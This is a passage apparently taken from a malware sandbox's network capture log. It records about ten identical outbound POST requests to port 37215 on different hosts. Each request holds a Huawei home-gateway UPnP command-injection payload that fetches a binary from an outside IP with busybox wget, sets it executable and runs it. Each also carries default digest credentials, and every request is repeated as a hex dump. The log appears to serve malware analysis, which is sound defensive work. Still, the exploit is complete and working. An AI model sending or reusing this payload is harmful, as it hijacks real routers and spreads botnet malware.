                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            98192.168.2.154928041.131.96.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733753920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            99192.168.2.155301841.165.83.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733779907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            100192.168.2.154798041.13.215.1537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733804941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            101192.168.2.155294241.227.61.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733828068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            102192.168.2.154232841.12.73.2037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733846903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            103192.168.2.155063241.171.176.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733880043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            104192.168.2.154297241.243.72.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733903885 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            105192.168.2.154016641.39.192.9637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733957052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            106192.168.2.153698241.124.208.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733982086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            107192.168.2.153708441.15.115.21537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733987093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 